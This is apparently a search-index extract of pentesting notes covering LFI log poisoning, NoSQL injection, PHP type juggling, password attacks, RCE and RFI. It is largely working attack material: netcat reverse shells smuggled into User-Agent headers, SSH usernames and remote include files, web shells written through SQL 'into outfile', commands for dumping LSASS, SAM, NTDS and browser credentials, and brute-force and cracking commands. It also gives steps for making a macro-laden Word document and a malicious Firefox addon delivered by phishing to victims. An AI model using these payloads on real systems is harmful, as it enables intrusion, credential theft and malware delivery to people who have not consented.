                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#procselfenviron","title":"/proc/self/environ","text":"

This file contains environment variables. One of those variables might be HTTP_USER_AGENT, which is the user agent used by the client to access the server. So by using a proxy interceptor we could modify that header to be, let's say:

<?php phpinfo(); ?>\n

When it comes to getting a shell here, we need to use the PHP function passthru(), which is similar to the exec command:

                                            passthru\u00a0\u2014\u00a0Execute an external program and display raw output

                                            In this case, we would be adding in the user agent header the reverse shell:

                                            <?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?> \n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#varlogauthlog-or-varlogapache2accesslog","title":"/var/log/auth.log or /var/log/apache2/access.log","text":"

If we have the ability to read a log file, we can check whether we can also write to it in a malicious way (log poisoning).

For instance, with /var/log/auth.log, we can try an SSH connection and see how these attempts are recorded in the file. Then, instead of using a real username, we can set some PHP code:

                                            ssh \"<?passthru('nc -e /bin/sh <attacker IP> <attacker port>');?>\"@$ip \n

But there might be problems with blank spaces, slashes and so on, so one thing you can do is base64-encode your netcat command and tell the function to decode it before executing it:

# base64 encode your netcat command: nc -e /bin/sh <attacker IP> <attacker port>\nssh \"<?passthru(base64_decode('<base64 encoded text>'));?>\"@$ip \n

Now just set up a netcat listener on your Kali attacker machine.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/nosql-injection/","title":"NoSQL injection","text":"

                                            Dictionary for NoSQL injections.

                                            Examples of NoSQL databases: redis, mongo.

SQL stands for Structured Query Language. NoSQL Injection is a security vulnerability that occurs in applications that utilize NoSQL databases. It is a type of attack that involves an attacker manipulating a NoSQL database query by injecting malicious input, leading to unauthorized access, data leakage, or unintended operations. In traditional SQL Injection attacks, attackers exploit vulnerabilities by inserting malicious SQL code into input fields that are concatenated with database queries. Similarly, in NoSQL Injection, attackers exploit weaknesses in the application's handling of user-supplied input to manipulate NoSQL database queries.

How does a NoSQL injection work? Consider this example:

// MongoDB query\nvar query = {\n    username: username,\n    password: password\n};\n\n// Perform query to check if credentials are valid\nvar result = db.users.findOne(query);\n\nif (result) {\n    // Login successful\n} else {\n    // Login failed\n}\n

                                            In this example, the application constructs a MongoDB query using user-supplied values for the username and password fields. If an attacker intentionally provides a specially crafted value, they could potentially exploit a NoSQL injection vulnerability. For instance, an attacker might enter the following value as the username parameter:

                                            $gt:\"\"\n

                                            The attacker could potentially bypass the login mechanism and gain unauthorized access.

                                            Typical payloads:

# Payload\nusername[$ne]=1&password[$ne]=1\n# Use case/Function: Not equals to (Auth Bypass)\n\n# Payload\nusername[$regex]=^adm&password[$ne]=1\n# Use case/Function: Checks a regular expression (Auth Bypass)\n\n# Payload\nusername[$regex]=.{25}&pass[$ne]=1\n# Use case/Function: Checks regex to find the length of a value\n\n# Payload\nusername[$eq]=admin&password[$ne]=1 \n# Use case/Function: Equals to.\n\n# Payload\nusername[$ne]=admin&pass[$gt]=s \n# Use case/Function: Greater than.\n
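Delivering these with curl (the login endpoints are assumptions); in the URL-encoded form the bracket syntax produces the operator object server-side, while JSON APIs take the operator directly:

```bash
# URL-encoded form fields (curl joins multiple -d values with &)
curl -s -X POST "http://$ip/login" -d 'username[$ne]=1' -d 'password[$ne]=1'
# JSON body
curl -s -X POST "http://$ip/api/login" -H 'Content-Type: application/json' \
     -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
```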

                                            Example of a user search form:

                                            With the not equal operator, it will return all users except for \"admin\".

                                            ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/password-attacks/","title":"Password attacks","text":"","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#connecting-to-target","title":"Connecting to Target","text":"
                                            # CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol\nxfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!\n
                                            # Uses Evil-WinRM to establish a Powershell session with a target. \nevil-winrm -i <ip> -u user -p password\n
                                            # Uses SSH to connect to a target using a specified user.\nssh user@<ip>\n
                                            # Uses smbclient to connect to an SMB share using a specified user.\nsmbclient -U user \\\\\\\\<ip>\\\\SHARENAME\n
                                            # Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.\npython3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#password-mutations","title":"Password mutations","text":"
                                            # Uses cewl to generate a wordlist based on keywords present on a website.\ncewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist\n
                                            # Uses Hashcat to generate a rule-based word list.\nhashcat --force password.list -r custom.rule --stdout > mut_password.list\n
# Uses the username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential usernames.\n./username-anarchy -i /path/to/listoffirstandlastnames.txt\n
# Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords.\ncurl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep \"\\.\" | tee -a compressed_ext.txt\n
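
For intuition, a rough Python sketch of the kind of mutations a hashcat rule file applies (capitalization, basic leetspeak, appended suffixes); the rules shown are assumptions, not the contents of custom.rule:

# Emulates a few common password-mutation rules over password.list.\nleet = str.maketrans('aeios', '43105')\n\ndef mutate(word):\n    yield word\n    yield word.capitalize()\n    yield word.translate(leet)\n    for suffix in ('1', '123', '2023', '!'):\n        yield word + suffix\n        yield word.capitalize() + suffix\n\nwith open('password.list') as wordlist:\n    for line in wordlist:\n        for candidate in mutate(line.strip()):\n            print(candidate)\n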
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#remote-password-attacks","title":"Remote Password Attacks","text":"
                                            # Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.\ncrackmapexec winrm <ip> -u user.list -p password.list\n
                                            # Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. \ncrackmapexec smb <ip> -u \"user\" -p \"password\" --shares\n
                                            # Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.\nhydra -L user.list -P password.list <service>://<ip>\n
                                            # Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.\nhydra -l username -P password.list <service>://<ip>\n
                                            # Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.\nhydra -L user.list -p password <service>://<ip>  \n
                                            # Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.\nhydra -C <user_pass.list> ssh://<IP>\n
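
The same credential-stuffing idea in script form: a hedged paramiko sketch that tries each user:password line over SSH (the host and list name are placeholders; network errors are not handled):

import paramiko\n\ndef try_ssh(host, user, password):\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    try:\n        client.connect(host, username=user, password=password, timeout=5)\n        return True\n    except paramiko.AuthenticationException:\n        return False\n    finally:\n        client.close()\n\nwith open('user_pass.list') as creds:  # one user:password pair per line\n    for line in creds:\n        user, _, password = line.strip().partition(':')\n        if try_ssh('10.10.10.10', user, password):\n            print(f'valid credentials: {user}:{password}')\n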
                                            # Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --sam\n
                                            # Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa\n
                                            # Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. \ncrackmapexec smb <ip> -u <username> -p <password> --ntds\n
                                            # Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of `Pass-The-Hash` attack.\nevil-winrm -i <ip>  -u  Administrator -H \"<passwordhash>\" \n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#windows-local-password-attacks","title":"Windows Local Password Attacks","text":"
                                            # A command-line-based utility in Windows used to list running processes.\ntasklist /svc                        \n
                                            # Uses Windows command-line based utility findstr to search for the string \"password\" in many different file type.\nfindstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                                            # A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. \nGet-Process lsass\n
                                            # Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. \nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full\n
                                            # Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. \npypykatz lsa minidump /path/to/lsassdumpfile\n
                                            # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\\sam, hklm\\security, hklm\\system).\nreg.exe save hklm\\sam C:\\sam.save\n
                                            # Uses move in Windows to transfer a file to a specified file share over the network. \nmove sam.save \\\\<ip>\\NameofFileShare\n
                                            # Uses Secretsdump.py to dump password hashes from the SAM database.\npython3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n
                                            # Uses Windows command line based tool vssadmin to create a volume shadow copy for `C:`. This can be used to make a copy of NTDS.dit safely. \nvssadmin CREATE SHADOW /For=C:\n
                                            # Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of `C:`. \ncmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit \n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#linux-local-password-attacks","title":"Linux Local Password Attacks","text":"
# Script that can be used to find .conf, .config and .cnf files on a Linux system.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Script that can be used to find credentials in specified file types.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n\n# Script that can be used to find common database files.\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n\n# Uses Linux-based find command to search for text files.\nfind /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n\n# Script that can be used to search for common file types used with scripts.\nfor l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n\n# Script used to look for common types of documents.\nfor ext in $(echo \".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*\");do echo -e \"\\nFile extension: \" $ext; find / -name *$ext 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Uses Linux-based cat command to view the contents of crontab in search of credentials.\ncat /etc/crontab\n\n# Uses Linux-based ls -la command to list all files that start with `cron` contained in the etc directory.\nls -la /etc/cron.*/\n\n# Uses Linux-based command grep to search the file system for the key term `PRIVATE KEY` to discover SSH keys.\ngrep -rnw \"PRIVATE KEY\" /* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory.\ngrep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based grep command to search for the keyword `ssh-rsa` within files contained in a user's home directory.\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based tail command to search through the bash history files and output the last 5 lines.\ntail -n5 /home/*/.bash*\n\n# Runs Mimipenguin.py using python3.\npython3 mimipenguin.py\n\n# Runs Mimipenguin.sh using bash.\nbash mimipenguin.sh\n\n# Runs Lazagne.py with all modules using python2.7.\npython2.7 lazagne.py all\n\n# Uses Linux-based commands to list files stored by Firefox, then searches for the keyword `default` using grep.\nls -l .mozilla/firefox/ | grep default\n\n# Uses Linux-based command cat to view credentials stored by Firefox in JSON.\ncat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .\n\n# Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.\npython3.9 firefox_decrypt.py\n\n# Runs Lazagne.py browsers module using Python 3.\npython3 lazagne.py browsers\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#cracking-passwords","title":"Cracking Passwords","text":"
# Uses Hashcat to crack NTLM hashes using a specified wordlist.\nhashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt\n\n# Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.\nhashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show\n\n# Uses unshadow to combine data from passwd.bak and shadow.bak into one single file to prepare for cracking.\nunshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes\n\n# Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.\nhashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n\n# Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.\nhashcat -m 500 -a 0 md5-hashes.list rockyou.txt\n\n# Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.\nhashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked\n\n# Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.\nssh2john.pl SSH.private > ssh.hash\n\n# Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.\njohn ssh.hash --show\n\n# Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.\noffice2john.py Protected.docx > protected-docx.hash\n\n# Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.\njohn --wordlist=rockyou.txt protected-docx.hash\n\n# Runs Pdf2john.pl script to convert a pdf file to a pdf hash to be cracked.\npdf2john.pl PDF.pdf > pdf.hash\n\n# Runs John in conjunction with a wordlist to crack a pdf hash.\njohn --wordlist=rockyou.txt pdf.hash\n\n# Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.\nzip2john ZIP.zip > zip.hash\n\n# Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.\njohn --wordlist=rockyou.txt zip.hash\n\n# Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.\nbitlocker2john -i Backup.vhd > backup.hashes\n\n# Uses the Linux-based file tool to gather file format information.\nfile GZIP.gzip\n\n# Script that runs a for-loop to try each wordlist entry as the decryption key for an encrypted archive, extracting it on success.\nfor i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done\n
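
For intuition about what mode 1000 actually cracks: NTLM is just MD4 over the UTF-16-LE encoding of the password, so a wordlist check can be sketched in a few lines of Python (hashlib's md4 may require OpenSSL's legacy provider on recent systems):

import hashlib\n\ndef ntlm(password):\n    # NTLM hash = MD4(UTF-16-LE(password))\n    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()\n\ntarget = '64f12cddaa88057e06a81b54e73b949b'  # the example hash from above\nwith open('/usr/share/wordlists/rockyou.txt', encoding='latin-1') as wordlist:\n    for word in wordlist:\n        word = word.strip()\n        if ntlm(word) == target:\n            print(f'cracked: {word}')\n            break\n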
                                            ","tags":["OSCP"]},{"location":"webexploitation/payloads/","title":"Creating malware and custom payloads","text":"","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#av0id","title":"AV0id","text":"

                                            AV0id.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#darkarmour","title":"Darkarmour","text":"

                                            Darkarmour

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#empire","title":"Empire","text":"

                                            Empire cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#fatrat","title":"FatRat","text":"

                                            FatRat cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#mythic-c2-framework","title":"Mythic C2 Framework","text":"

                                            https://github.com/its-a-feature/Mythic The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#msfvenom","title":"msfvenom","text":"

                                            msfvenom cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#nishang","title":"Nishang","text":"

                                            nishang cheat sheet

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#syringe","title":"Syringe","text":"

                                            syringe

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#veil","title":"Veil","text":"

                                            Veil cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-pdf","title":"Creating malware in pdf","text":"

Use one of these two Metasploit modules:

                                            • exploit/windows/fileformat/adobe_pdf_embedded_exe
                                            • exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-word-document","title":"Creating malware in word document","text":"

                                            1. Craft an executable

                                            Use for instance veil.

                                            2. Convert it to a VisualBasic script - macro code

                                            locate exe2vba\n# Result: /usr/share/metasploit-framework/tools/exploit/exe2vba.rb\n\n# Go to the folder\ncd /usr/share/metasploit-framework/tools/exploit/\n\n# Create the malicious vba script\n./exe2vba.rb <first-parameter> path/to/nameOfOutputFile.vba\n# first parameter: malicious executable file that will be converted to macro code. Take the path to the .exe file provided by veil\n

                                            3. Create an MS Word document

4. Open a new macro and embed the macro code

                                            5. Copy the payload as text in the word document. If it's too long, disguise it (set font color to white).

                                            6. Convince the victim to have macros enabled.

                                            7. Start a listener and wait for the victim to connect.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-a-firefox-addon","title":"Creating malware in a Firefox addon","text":"

                                            Use the metasploit module to generate the addon: exploit/multi/browser/firefox_xpi_bootstrapped_addon

It will be served from SRVHOST:SRVPORT/URIPATH. You can then deliver this URL through a phishing email.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/php-type-juggling-vulnerabilities/","title":"PHP Type Juggling Vulnerabilities","text":"

                                            Read PHP Type Juggling Vulnerabilities.

                                            Copy-pasted, quoted:

                                            How vulnerability arises\n\nThe most common way that this particularity in PHP is exploited is by using it to bypass authentication.\n\nLet\u2019s say the PHP code that handles authentication looks like this:\n\nif ($_POST[\"password\"] == \"Admin_Password\") {login_as_admin();}\n\nThen, simply submitting an integer input of 0 would successfully log you in as admin, since this will evaluate to True:\n\n(0 == \u201cAdmin_Password\u201d) -> True\n

In the HackTheBox machine Base, the login form was bypassable by entering an empty array into the username and password parameters:

                                            Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                                            Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n
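
The same bypass can be replayed from a script; a minimal sketch with Python requests (the expected redirect to /upload.php comes from the vulnerable source shown below):

import requests\n\nr = requests.post(\n    'http://base.htb/login/login.php',\n    data={'username[]': 'admin', 'password[]': 'admin'},\n    allow_redirects=False,\n)\n# On success the vulnerable code sets the session and redirects to /upload.php\nprint(r.status_code, r.headers.get('Location'))\n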

How could we know? By spotting the file login.php.swp in the exposed /login directory and reading its contents with:

                                            vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

                                            Content:

                                            <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

The bypass works because PHP's strcmp() returns NULL (with a warning) when comparing a string with an array, and NULL == 0 evaluates to true under loose comparison. Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator === instead of the loose comparison operator ==. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                                            ","tags":["web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/","title":"RFD attack - Reflected File Download","text":"

A Reflected File Download (RFD) attack combines URL path segments with web services vulnerable to JSONP injection; the goal is to deliver malware to end users of the system.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#cool-proof-of-concept","title":"Cool proof of concept","text":"

                                            https://medium.com/@Johne_Jacob/rfd-reflected-file-download-what-how-6d0e6fdbe331.

                                            Read more: https://hackerone.com/reports/39658

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#prevention-and-mitigation","title":"Prevention and mitigation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#-x-content-type-options-nosniff-header-to-api-response","title":"- \"X-Content-Type-Options: nosniff\" header to API response.","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/","title":"RCE attack - Remote Code Execution","text":"OWASP
                                            [OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presence of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.

RCE (Remote Code Execution) attacks involve an attacker exploiting code vulnerabilities to execute arbitrary commands on a target system and gain access to it.

Exploiting a blind Remote Code Execution vulnerability via a GET request, using Burp Suite (to send the requests) and Wireshark (to capture the traffic):

________\nGET /script.php?c=sleep+5&ok=ok HTTP/1.1\nHost: 192.168.137.130\nUser-Agent: ...\n...\n________\n

Another command:

                                            GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1\n
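
The delay can also be measured from a script instead of Wireshark; a minimal sketch (the host comes from the request above; parameter handling is assumed):

import time\n\nimport requests\n\nurl = 'http://192.168.137.130/script.php'\n\ndef timed(cmd):\n    start = time.time()\n    requests.get(url, params={'c': cmd, 'ok': 'ok'})\n    return time.time() - start\n\nbaseline = timed('true')\ndelayed = timed('sleep 5')\nif delayed - baseline > 4:\n    print('blind command injection confirmed (~5 second delay)')\n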
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/#gaining-a-reverse-shell-from-sql-injection","title":"Gaining a reverse shell from SQL injection","text":"

Take a WordPress installation that uses a MySQL database. If you manage to log in to the MySQL panel (/phpmyadmin) as root, then you could upload a PHP shell to the /wp-content/uploads/ folder.

                                            Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n

                                            Now code can be executed from the browser:

                                            https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd\n

                                            One more example:

                                            Select \"<?php $output=shell_exec($_GET['cmd']);echo \"<pre>\".$output.\"</pre>\"?>\" into outfile \"/var/www/https/shell.php\" from mysql.user limit 1;\n

                                            Now code can be executed from the browser:

                                            https://example.com/shell.php?cmd=cat+/etc/passwd\n
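
The uploaded shell can likewise be driven from a script; a small sketch using the URL above:

import requests\n\nshell = 'https://example.com/shell.php'\nr = requests.get(shell, params={'cmd': 'cat /etc/passwd'})\nprint(r.text)\n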
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/","title":"RFI attack - Remote File Inclusion","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                                            ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allows an attacker to include and execute remote files on a web server. It arises due to improper handling of user-supplied input within the context of file inclusion operations, and it can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#causes","title":"Causes","text":"
                                            • Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
                                            • Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
                                            • Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
                                            • Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#how-to-exploit-it","title":"How to exploit it?","text":"

                                            Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.

                                            Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.

                                            Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#php","title":"php","text":"

In the php.ini file there are some directives that define this policy:

                                            • allow_url_fopen
                                            • allow_url_include

If these directives are enabled (set to On), then an LFI can be turned into a Remote File Inclusion.

                                            1. Create a php file with the remote shell

                                            nano reverse.txt\n

                                            2. In that php file, craft malicious code

<?php\npassthru(\"nc -e /bin/sh <attacker IP> <attacker port>\");\n?>\n
3. Serve that file from your machine (http_serve).

                                            4. Get your machine listening in a port with netcat.

5. At the injection point where you can make the application request a URL, point it to your file. For instance:

https://VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt\n\n# Sometimes, to get the PHP executed on the victim machine (and not the attacker), add an ?\nhttps://VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?\n

Sometimes there might be some filtering for the payload (which was http://<attackerip>/reverse.txt?). To bypass it:
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#using-uppercase","title":"using uppercase","text":"

https://VICTIMurlADDRESS/PATH/PATH/page=hTTP://<attackerip>/reverse.txt","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#other-bypassing-techniques-for-slashes","title":"Other bypassing techniques for slashes","text":"

Wrappers

PHP wrapper: php://filter allows the attacker to include a local file and base64-encode the output:

http://IPdomain/rfi.php?language=php://filter/convert.base64-encode/resource=recurso.php\n

PHP filter without base64 encoding:

php://filter/resource=flag.txt\n

DATA wrapper:

http://IPdomain/rfi.php?language=data://text/plain,<?php system($_GET['cmd']);?>&cmd=whoami\n

HTTP wrapper:

http://IPdomain/rfi.php?language=http://SERVERIP/shell.php\n

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#mitigation","title":"Mitigation","text":"

                                            In php.ini disallow:

                                            • allow_url_fopen
                                            • allow_url_include

Use static file inclusion (instead of dynamic file inclusion) by hardcoding the files you want to include, rather than taking them from GET or POST parameters.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
